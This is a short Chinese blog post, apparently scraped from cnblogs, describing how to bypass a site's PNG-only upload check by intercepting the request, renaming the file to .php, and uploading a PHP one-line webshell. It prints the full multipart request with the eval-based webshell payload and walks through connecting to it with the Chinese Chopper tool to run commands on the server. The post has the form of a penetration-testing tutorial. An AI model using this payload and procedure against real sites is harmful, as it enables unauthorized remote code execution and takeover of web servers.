zoukankan      html  css  js  c++  java
  • 绕过图片格式限制上传木马获取WebShell

    思路:

      图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php

    可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示,

    记录下来后用菜刀连接即可。 

    (1)网站要求上传png格式的文件

    (2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。

    Content-Disposition: form-data; name="fun_menu_icon"
    
    test123trojan.php
    -----------------------------1962884403821
    Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php"
    Content-Type: image/png
    
    <?php @eval($_POST['caidao']); ?>
    -----------------------------1962884403821
    Content-Disposition: form-data; name="fun_menu_img"
    
    test123trojan.php
    -----------------------------1962884403821
    Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php"
    Content-Type: image/png
    
    <?php @eval($_POST['caidao']); ?>

    (3)在原始数据提交页面或提交数据后response页面中查找上传路径并记录。

    (4)打开最新版中国菜刀,添加已经记录的路径,添加密码caidao

    (5)连接虚拟终端,输入ipconfig

       

    木马成功上传并执行。

  • 相关阅读:
    Boot-Repair&usb_repair
    Introducing ASLR for FreeBSD
    node.js操作Cookie
    Docker常见仓库MySQL
    Docker常见仓库CentOS
    Docker常见仓库Ubuntu
    Docker常见仓库Node.js
    Docker常见仓库WordPress
    Docker常见仓库Nginx
    Docker命令查询
  • 原文地址:https://www.cnblogs.com/tdcqma/p/5659270.html
Copyright © 2011-2022 走看看